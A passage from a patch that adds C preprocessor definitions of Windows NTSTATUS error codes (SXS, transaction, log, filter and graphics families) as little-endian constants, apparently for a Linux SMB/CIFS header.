++#define STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET cpu_to_le32(0xC015000E)
++#define STATUS_SXS_EARLY_DEACTIVATION cpu_to_le32(0xC015000F)
++#define STATUS_SXS_INVALID_DEACTIVATION cpu_to_le32(0xC0150010)
++#define STATUS_SXS_MULTIPLE_DEACTIVATION cpu_to_le32(0xC0150011)
++#define STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY	\
++	cpu_to_le32(0xC0150012)
++#define STATUS_SXS_PROCESS_TERMINATION_REQUESTED cpu_to_le32(0xC0150013)
++#define STATUS_SXS_CORRUPT_ACTIVATION_STACK cpu_to_le32(0xC0150014)
++#define STATUS_SXS_CORRUPTION cpu_to_le32(0xC0150015)
++#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE cpu_to_le32(0xC0150016)
++#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME cpu_to_le32(0xC0150017)
++#define STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE cpu_to_le32(0xC0150018)
++#define STATUS_SXS_IDENTITY_PARSE_ERROR cpu_to_le32(0xC0150019)
++#define STATUS_SXS_COMPONENT_STORE_CORRUPT cpu_to_le32(0xC015001A)
++#define STATUS_SXS_FILE_HASH_MISMATCH cpu_to_le32(0xC015001B)
++#define STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT	\
++	cpu_to_le32(0xC015001C)
++#define STATUS_SXS_IDENTITIES_DIFFERENT cpu_to_le32(0xC015001D)
++#define STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT cpu_to_le32(0xC015001E)
++#define STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY cpu_to_le32(0xC015001F)
++#define STATUS_ADVANCED_INSTALLER_FAILED cpu_to_le32(0xC0150020)
++#define STATUS_XML_ENCODING_MISMATCH cpu_to_le32(0xC0150021)
++#define STATUS_SXS_MANIFEST_TOO_BIG cpu_to_le32(0xC0150022)
++#define STATUS_SXS_SETTING_NOT_REGISTERED cpu_to_le32(0xC0150023)
++#define STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE cpu_to_le32(0xC0150024)
++#define STATUS_SMI_PRIMITIVE_INSTALLER_FAILED cpu_to_le32(0xC0150025)
++#define STATUS_GENERIC_COMMAND_FAILED cpu_to_le32(0xC0150026)
++#define STATUS_SXS_FILE_HASH_MISSING cpu_to_le32(0xC0150027)
++#define STATUS_TRANSACTIONAL_CONFLICT cpu_to_le32(0xC0190001)
++#define STATUS_INVALID_TRANSACTION cpu_to_le32(0xC0190002)
++#define STATUS_TRANSACTION_NOT_ACTIVE cpu_to_le32(0xC0190003)
++#define STATUS_TM_INITIALIZATION_FAILED cpu_to_le32(0xC0190004)
++#define STATUS_RM_NOT_ACTIVE cpu_to_le32(0xC0190005)
++#define STATUS_RM_METADATA_CORRUPT cpu_to_le32(0xC0190006)
++#define STATUS_TRANSACTION_NOT_JOINED cpu_to_le32(0xC0190007)
++#define STATUS_DIRECTORY_NOT_RM cpu_to_le32(0xC0190008)
++#define STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE cpu_to_le32(0xC019000A)
++#define STATUS_LOG_RESIZE_INVALID_SIZE cpu_to_le32(0xC019000B)
++#define STATUS_REMOTE_FILE_VERSION_MISMATCH cpu_to_le32(0xC019000C)
++#define STATUS_CRM_PROTOCOL_ALREADY_EXISTS cpu_to_le32(0xC019000F)
++#define STATUS_TRANSACTION_PROPAGATION_FAILED cpu_to_le32(0xC0190010)
++#define STATUS_CRM_PROTOCOL_NOT_FOUND cpu_to_le32(0xC0190011)
++#define STATUS_TRANSACTION_SUPERIOR_EXISTS cpu_to_le32(0xC0190012)
++#define STATUS_TRANSACTION_REQUEST_NOT_VALID cpu_to_le32(0xC0190013)
++#define STATUS_TRANSACTION_NOT_REQUESTED cpu_to_le32(0xC0190014)
++#define STATUS_TRANSACTION_ALREADY_ABORTED cpu_to_le32(0xC0190015)
++#define STATUS_TRANSACTION_ALREADY_COMMITTED cpu_to_le32(0xC0190016)
++#define STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER cpu_to_le32(0xC0190017)
++#define STATUS_CURRENT_TRANSACTION_NOT_VALID cpu_to_le32(0xC0190018)
++#define STATUS_LOG_GROWTH_FAILED cpu_to_le32(0xC0190019)
++#define STATUS_OBJECT_NO_LONGER_EXISTS cpu_to_le32(0xC0190021)
++#define STATUS_STREAM_MINIVERSION_NOT_FOUND cpu_to_le32(0xC0190022)
++#define STATUS_STREAM_MINIVERSION_NOT_VALID cpu_to_le32(0xC0190023)
++#define STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION	\
++	cpu_to_le32(0xC0190024)
++#define STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT cpu_to_le32(0xC0190025)
++#define STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS cpu_to_le32(0xC0190026)
++#define STATUS_HANDLE_NO_LONGER_VALID cpu_to_le32(0xC0190028)
++#define STATUS_LOG_CORRUPTION_DETECTED cpu_to_le32(0xC0190030)
++#define STATUS_RM_DISCONNECTED cpu_to_le32(0xC0190032)
++#define STATUS_ENLISTMENT_NOT_SUPERIOR cpu_to_le32(0xC0190033)
++#define STATUS_FILE_IDENTITY_NOT_PERSISTENT cpu_to_le32(0xC0190036)
++#define STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY cpu_to_le32(0xC0190037)
++#define STATUS_CANT_CROSS_RM_BOUNDARY cpu_to_le32(0xC0190038)
++#define STATUS_TXF_DIR_NOT_EMPTY cpu_to_le32(0xC0190039)
++#define STATUS_INDOUBT_TRANSACTIONS_EXIST cpu_to_le32(0xC019003A)
++#define STATUS_TM_VOLATILE cpu_to_le32(0xC019003B)
++#define STATUS_ROLLBACK_TIMER_EXPIRED cpu_to_le32(0xC019003C)
++#define STATUS_TXF_ATTRIBUTE_CORRUPT cpu_to_le32(0xC019003D)
++#define STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC019003E)
++#define STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED cpu_to_le32(0xC019003F)
++#define STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE cpu_to_le32(0xC0190040)
++#define STATUS_TRANSACTION_REQUIRED_PROMOTION cpu_to_le32(0xC0190043)
++#define STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION cpu_to_le32(0xC0190044)
++#define STATUS_TRANSACTIONS_NOT_FROZEN cpu_to_le32(0xC0190045)
++#define STATUS_TRANSACTION_FREEZE_IN_PROGRESS cpu_to_le32(0xC0190046)
++#define STATUS_NOT_SNAPSHOT_VOLUME cpu_to_le32(0xC0190047)
++#define STATUS_NO_SAVEPOINT_WITH_OPEN_FILES cpu_to_le32(0xC0190048)
++#define STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190049)
++#define STATUS_TM_IDENTITY_MISMATCH cpu_to_le32(0xC019004A)
++#define STATUS_FLOATED_SECTION cpu_to_le32(0xC019004B)
++#define STATUS_CANNOT_ACCEPT_TRANSACTED_WORK cpu_to_le32(0xC019004C)
++#define STATUS_CANNOT_ABORT_TRANSACTIONS cpu_to_le32(0xC019004D)
++#define STATUS_TRANSACTION_NOT_FOUND cpu_to_le32(0xC019004E)
++#define STATUS_RESOURCEMANAGER_NOT_FOUND cpu_to_le32(0xC019004F)
++#define STATUS_ENLISTMENT_NOT_FOUND cpu_to_le32(0xC0190050)
++#define STATUS_TRANSACTIONMANAGER_NOT_FOUND cpu_to_le32(0xC0190051)
++#define STATUS_TRANSACTIONMANAGER_NOT_ONLINE cpu_to_le32(0xC0190052)
++#define STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION	\
++	cpu_to_le32(0xC0190053)
++#define STATUS_TRANSACTION_NOT_ROOT cpu_to_le32(0xC0190054)
++#define STATUS_TRANSACTION_OBJECT_EXPIRED cpu_to_le32(0xC0190055)
++#define STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190056)
++#define STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED cpu_to_le32(0xC0190057)
++#define STATUS_TRANSACTION_RECORD_TOO_LONG cpu_to_le32(0xC0190058)
++#define STATUS_NO_LINK_TRACKING_IN_TRANSACTION cpu_to_le32(0xC0190059)
++#define STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION cpu_to_le32(0xC019005A)
++#define STATUS_TRANSACTION_INTEGRITY_VIOLATED cpu_to_le32(0xC019005B)
++#define STATUS_LOG_SECTOR_INVALID cpu_to_le32(0xC01A0001)
++#define STATUS_LOG_SECTOR_PARITY_INVALID cpu_to_le32(0xC01A0002)
++#define STATUS_LOG_SECTOR_REMAPPED cpu_to_le32(0xC01A0003)
++#define STATUS_LOG_BLOCK_INCOMPLETE cpu_to_le32(0xC01A0004)
++#define STATUS_LOG_INVALID_RANGE cpu_to_le32(0xC01A0005)
++#define STATUS_LOG_BLOCKS_EXHAUSTED cpu_to_le32(0xC01A0006)
++#define STATUS_LOG_READ_CONTEXT_INVALID cpu_to_le32(0xC01A0007)
++#define STATUS_LOG_RESTART_INVALID cpu_to_le32(0xC01A0008)
++#define STATUS_LOG_BLOCK_VERSION cpu_to_le32(0xC01A0009)
++#define STATUS_LOG_BLOCK_INVALID cpu_to_le32(0xC01A000A)
++#define STATUS_LOG_READ_MODE_INVALID cpu_to_le32(0xC01A000B)
++#define STATUS_LOG_METADATA_CORRUPT cpu_to_le32(0xC01A000D)
++#define STATUS_LOG_METADATA_INVALID cpu_to_le32(0xC01A000E)
++#define STATUS_LOG_METADATA_INCONSISTENT cpu_to_le32(0xC01A000F)
++#define STATUS_LOG_RESERVATION_INVALID cpu_to_le32(0xC01A0010)
++#define STATUS_LOG_CANT_DELETE cpu_to_le32(0xC01A0011)
++#define STATUS_LOG_CONTAINER_LIMIT_EXCEEDED cpu_to_le32(0xC01A0012)
++#define STATUS_LOG_START_OF_LOG cpu_to_le32(0xC01A0013)
++#define STATUS_LOG_POLICY_ALREADY_INSTALLED cpu_to_le32(0xC01A0014)
++#define STATUS_LOG_POLICY_NOT_INSTALLED cpu_to_le32(0xC01A0015)
++#define STATUS_LOG_POLICY_INVALID cpu_to_le32(0xC01A0016)
++#define STATUS_LOG_POLICY_CONFLICT cpu_to_le32(0xC01A0017)
++#define STATUS_LOG_PINNED_ARCHIVE_TAIL cpu_to_le32(0xC01A0018)
++#define STATUS_LOG_RECORD_NONEXISTENT cpu_to_le32(0xC01A0019)
++#define STATUS_LOG_RECORDS_RESERVED_INVALID cpu_to_le32(0xC01A001A)
++#define STATUS_LOG_SPACE_RESERVED_INVALID cpu_to_le32(0xC01A001B)
++#define STATUS_LOG_TAIL_INVALID cpu_to_le32(0xC01A001C)
++#define STATUS_LOG_FULL cpu_to_le32(0xC01A001D)
++#define STATUS_LOG_MULTIPLEXED cpu_to_le32(0xC01A001E)
++#define STATUS_LOG_DEDICATED cpu_to_le32(0xC01A001F)
++#define STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS cpu_to_le32(0xC01A0020)
++#define STATUS_LOG_ARCHIVE_IN_PROGRESS cpu_to_le32(0xC01A0021)
++#define STATUS_LOG_EPHEMERAL cpu_to_le32(0xC01A0022)
++#define STATUS_LOG_NOT_ENOUGH_CONTAINERS cpu_to_le32(0xC01A0023)
++#define STATUS_LOG_CLIENT_ALREADY_REGISTERED cpu_to_le32(0xC01A0024)
++#define STATUS_LOG_CLIENT_NOT_REGISTERED cpu_to_le32(0xC01A0025)
++#define STATUS_LOG_FULL_HANDLER_IN_PROGRESS cpu_to_le32(0xC01A0026)
++#define STATUS_LOG_CONTAINER_READ_FAILED cpu_to_le32(0xC01A0027)
++#define STATUS_LOG_CONTAINER_WRITE_FAILED cpu_to_le32(0xC01A0028)
++#define STATUS_LOG_CONTAINER_OPEN_FAILED cpu_to_le32(0xC01A0029)
++#define STATUS_LOG_CONTAINER_STATE_INVALID cpu_to_le32(0xC01A002A)
++#define STATUS_LOG_STATE_INVALID cpu_to_le32(0xC01A002B)
++#define STATUS_LOG_PINNED cpu_to_le32(0xC01A002C)
++#define STATUS_LOG_METADATA_FLUSH_FAILED cpu_to_le32(0xC01A002D)
++#define STATUS_LOG_INCONSISTENT_SECURITY cpu_to_le32(0xC01A002E)
++#define STATUS_LOG_APPENDED_FLUSH_FAILED cpu_to_le32(0xC01A002F)
++#define STATUS_LOG_PINNED_RESERVATION cpu_to_le32(0xC01A0030)
++#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC01B00EA)
++#define STATUS_FLT_NO_HANDLER_DEFINED cpu_to_le32(0xC01C0001)
++#define STATUS_FLT_CONTEXT_ALREADY_DEFINED cpu_to_le32(0xC01C0002)
++#define STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST cpu_to_le32(0xC01C0003)
++#define STATUS_FLT_DISALLOW_FAST_IO cpu_to_le32(0xC01C0004)
++#define STATUS_FLT_INVALID_NAME_REQUEST cpu_to_le32(0xC01C0005)
++#define STATUS_FLT_NOT_SAFE_TO_POST_OPERATION cpu_to_le32(0xC01C0006)
++#define STATUS_FLT_NOT_INITIALIZED cpu_to_le32(0xC01C0007)
++#define STATUS_FLT_FILTER_NOT_READY cpu_to_le32(0xC01C0008)
++#define STATUS_FLT_POST_OPERATION_CLEANUP cpu_to_le32(0xC01C0009)
++#define STATUS_FLT_INTERNAL_ERROR cpu_to_le32(0xC01C000A)
++#define STATUS_FLT_DELETING_OBJECT cpu_to_le32(0xC01C000B)
++#define STATUS_FLT_MUST_BE_NONPAGED_POOL cpu_to_le32(0xC01C000C)
++#define STATUS_FLT_DUPLICATE_ENTRY cpu_to_le32(0xC01C000D)
++#define STATUS_FLT_CBDQ_DISABLED cpu_to_le32(0xC01C000E)
++#define STATUS_FLT_DO_NOT_ATTACH cpu_to_le32(0xC01C000F)
++#define STATUS_FLT_DO_NOT_DETACH cpu_to_le32(0xC01C0010)
++#define STATUS_FLT_INSTANCE_ALTITUDE_COLLISION cpu_to_le32(0xC01C0011)
++#define STATUS_FLT_INSTANCE_NAME_COLLISION cpu_to_le32(0xC01C0012)
++#define STATUS_FLT_FILTER_NOT_FOUND cpu_to_le32(0xC01C0013)
++#define STATUS_FLT_VOLUME_NOT_FOUND cpu_to_le32(0xC01C0014)
++#define STATUS_FLT_INSTANCE_NOT_FOUND cpu_to_le32(0xC01C0015)
++#define STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND cpu_to_le32(0xC01C0016)
++#define STATUS_FLT_INVALID_CONTEXT_REGISTRATION cpu_to_le32(0xC01C0017)
++#define STATUS_FLT_NAME_CACHE_MISS cpu_to_le32(0xC01C0018)
++#define STATUS_FLT_NO_DEVICE_OBJECT cpu_to_le32(0xC01C0019)
++#define STATUS_FLT_VOLUME_ALREADY_MOUNTED cpu_to_le32(0xC01C001A)
++#define STATUS_FLT_ALREADY_ENLISTED cpu_to_le32(0xC01C001B)
++#define STATUS_FLT_CONTEXT_ALREADY_LINKED cpu_to_le32(0xC01C001C)
++#define STATUS_FLT_NO_WAITER_FOR_REPLY cpu_to_le32(0xC01C0020)
++#define STATUS_MONITOR_NO_DESCRIPTOR cpu_to_le32(0xC01D0001)
++#define STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT cpu_to_le32(0xC01D0002)
++#define STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM cpu_to_le32(0xC01D0003)
++#define STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK cpu_to_le32(0xC01D0004)
++#define STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED cpu_to_le32(0xC01D0005)
++#define STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK	\
++	cpu_to_le32(0xC01D0006)
++#define STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK	\
++	cpu_to_le32(0xC01D0007)
++#define STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA cpu_to_le32(0xC01D0008)
++#define STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK cpu_to_le32(0xC01D0009)
++#define STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER cpu_to_le32(0xC01E0000)
++#define STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER cpu_to_le32(0xC01E0001)
++#define STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER cpu_to_le32(0xC01E0002)
++#define STATUS_GRAPHICS_ADAPTER_WAS_RESET cpu_to_le32(0xC01E0003)
++#define STATUS_GRAPHICS_INVALID_DRIVER_MODEL cpu_to_le32(0xC01E0004)
++#define STATUS_GRAPHICS_PRESENT_MODE_CHANGED cpu_to_le32(0xC01E0005)
++#define STATUS_GRAPHICS_PRESENT_OCCLUDED cpu_to_le32(0xC01E0006)
++#define STATUS_GRAPHICS_PRESENT_DENIED cpu_to_le32(0xC01E0007)
++#define STATUS_GRAPHICS_CANNOTCOLORCONVERT cpu_to_le32(0xC01E0008)
++#define STATUS_GRAPHICS_NO_VIDEO_MEMORY cpu_to_le32(0xC01E0100)
++#define STATUS_GRAPHICS_CANT_LOCK_MEMORY cpu_to_le32(0xC01E0101)
++#define STATUS_GRAPHICS_ALLOCATION_BUSY cpu_to_le32(0xC01E0102)
++#define STATUS_GRAPHICS_TOO_MANY_REFERENCES cpu_to_le32(0xC01E0103)
++#define STATUS_GRAPHICS_TRY_AGAIN_LATER cpu_to_le32(0xC01E0104)
++#define STATUS_GRAPHICS_TRY_AGAIN_NOW cpu_to_le32(0xC01E0105)
++#define STATUS_GRAPHICS_ALLOCATION_INVALID cpu_to_le32(0xC01E0106)
++#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE cpu_to_le32(0xC01E0107)
++#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED cpu_to_le32(0xC01E0108)
++#define STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION cpu_to_le32(0xC01E0109)
++#define STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE cpu_to_le32(0xC01E0110)
++#define STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION cpu_to_le32(0xC01E0111)
++#define STATUS_GRAPHICS_ALLOCATION_CLOSED cpu_to_le32(0xC01E0112)
++#define STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE cpu_to_le32(0xC01E0113)
++#define STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE cpu_to_le32(0xC01E0114)
++#define STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE cpu_to_le32(0xC01E0115)
++#define STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST cpu_to_le32(0xC01E0116)
++#define STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE cpu_to_le32(0xC01E0200)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0300)
++#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED cpu_to_le32(0xC01E0301)
++#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED	\
++	cpu_to_le32(0xC01E0302)
++#define STATUS_GRAPHICS_INVALID_VIDPN cpu_to_le32(0xC01E0303)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE cpu_to_le32(0xC01E0304)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET cpu_to_le32(0xC01E0305)
++#define STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED cpu_to_le32(0xC01E0306)
++#define STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET cpu_to_le32(0xC01E0308)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET cpu_to_le32(0xC01E0309)
++#define STATUS_GRAPHICS_INVALID_FREQUENCY cpu_to_le32(0xC01E030A)
++#define STATUS_GRAPHICS_INVALID_ACTIVE_REGION cpu_to_le32(0xC01E030B)
++#define STATUS_GRAPHICS_INVALID_TOTAL_REGION cpu_to_le32(0xC01E030C)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE	\
++	cpu_to_le32(0xC01E0310)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE	\
++	cpu_to_le32(0xC01E0311)
++#define STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET cpu_to_le32(0xC01E0312)
++#define STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY cpu_to_le32(0xC01E0313)
++#define STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET cpu_to_le32(0xC01E0314)
++#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET cpu_to_le32(0xC01E0315)
++#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET cpu_to_le32(0xC01E0316)
++#define STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET cpu_to_le32(0xC01E0317)
++#define STATUS_GRAPHICS_TARGET_ALREADY_IN_SET cpu_to_le32(0xC01E0318)
++#define STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH cpu_to_le32(0xC01E0319)
++#define STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY cpu_to_le32(0xC01E031A)
++#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET	\
++	cpu_to_le32(0xC01E031B)
++#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE cpu_to_le32(0xC01E031C)
++#define STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET cpu_to_le32(0xC01E031D)
++#define STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET cpu_to_le32(0xC01E031F)
++#define STATUS_GRAPHICS_STALE_MODESET cpu_to_le32(0xC01E0320)
++#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET cpu_to_le32(0xC01E0321)
++#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE cpu_to_le32(0xC01E0322)
++#define STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN cpu_to_le32(0xC01E0323)
++#define STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0324)
++#define STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION	\
++	cpu_to_le32(0xC01E0325)
++#define STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES	\
++	cpu_to_le32(0xC01E0326)
++#define STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0327)
++#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE	\
++	cpu_to_le32(0xC01E0328)
++#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET	\
++	cpu_to_le32(0xC01E0329)
++#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET cpu_to_le32(0xC01E032A)
++#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR cpu_to_le32(0xC01E032B)
++#define STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET cpu_to_le32(0xC01E032C)
++#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET cpu_to_le32(0xC01E032D)
++#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE	\
++	cpu_to_le32(0xC01E032E)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE cpu_to_le32(0xC01E032F)
++#define STATUS_GRAPHICS_RESOURCES_NOT_RELATED cpu_to_le32(0xC01E0330)
++#define STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0331)
++#define STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0332)
++#define STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET cpu_to_le32(0xC01E0333)
++#define STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER	\
++	cpu_to_le32(0xC01E0334)
++#define STATUS_GRAPHICS_NO_VIDPNMGR cpu_to_le32(0xC01E0335)
++#define STATUS_GRAPHICS_NO_ACTIVE_VIDPN cpu_to_le32(0xC01E0336)
++#define STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0337)
++#define STATUS_GRAPHICS_MONITOR_NOT_CONNECTED cpu_to_le32(0xC01E0338)
++#define STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0339)
++#define STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE cpu_to_le32(0xC01E033A)
++#define STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE cpu_to_le32(0xC01E033B)
++#define STATUS_GRAPHICS_INVALID_STRIDE cpu_to_le32(0xC01E033C)
++#define STATUS_GRAPHICS_INVALID_PIXELFORMAT cpu_to_le32(0xC01E033D)
++#define STATUS_GRAPHICS_INVALID_COLORBASIS cpu_to_le32(0xC01E033E)
++#define STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE cpu_to_le32(0xC01E033F)
++#define STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0340)
++#define STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT	\
++	cpu_to_le32(0xC01E0341)
++#define STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE cpu_to_le32(0xC01E0342)
++#define STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN cpu_to_le32(0xC01E0343)
++#define STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL cpu_to_le32(0xC01E0344)
++#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION	\
++	cpu_to_le32(0xC01E0345)
++#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED \
++	cpu_to_le32(0xC01E0346)
++#define STATUS_GRAPHICS_INVALID_GAMMA_RAMP cpu_to_le32(0xC01E0347)
++#define STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED cpu_to_le32(0xC01E0348)
++#define STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED cpu_to_le32(0xC01E0349)
++#define STATUS_GRAPHICS_MODE_NOT_IN_MODESET cpu_to_le32(0xC01E034A)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON	\
++	cpu_to_le32(0xC01E034D)
++#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE cpu_to_le32(0xC01E034E)
++#define STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE cpu_to_le32(0xC01E034F)
++#define STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS	\
++	cpu_to_le32(0xC01E0350)
++#define STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING cpu_to_le32(0xC01E0352)
++#define STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED cpu_to_le32(0xC01E0353)
++#define STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS cpu_to_le32(0xC01E0354)
++#define STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT cpu_to_le32(0xC01E0355)
++#define STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM cpu_to_le32(0xC01E0356)
++#define STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN	\
++	cpu_to_le32(0xC01E0357)
++#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT	\
++	cpu_to_le32(0xC01E0358)
++#define STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED cpu_to_le32(0xC01E0359)
++#define STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION	\
++	cpu_to_le32(0xC01E035A)
++#define STATUS_GRAPHICS_INVALID_CLIENT_TYPE cpu_to_le32(0xC01E035B)
++#define STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET cpu_to_le32(0xC01E035C)
++#define STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED	\
++	cpu_to_le32(0xC01E0400)
++#define STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED cpu_to_le32(0xC01E0401)
++#define STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER cpu_to_le32(0xC01E0430)
++#define STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED cpu_to_le32(0xC01E0431)
++#define STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED cpu_to_le32(0xC01E0432)
++#define STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY cpu_to_le32(0xC01E0433)
++#define STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED cpu_to_le32(0xC01E0434)
++#define STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON cpu_to_le32(0xC01E0435)
++#define STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE cpu_to_le32(0xC01E0436)
++#define STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER cpu_to_le32(0xC01E0438)
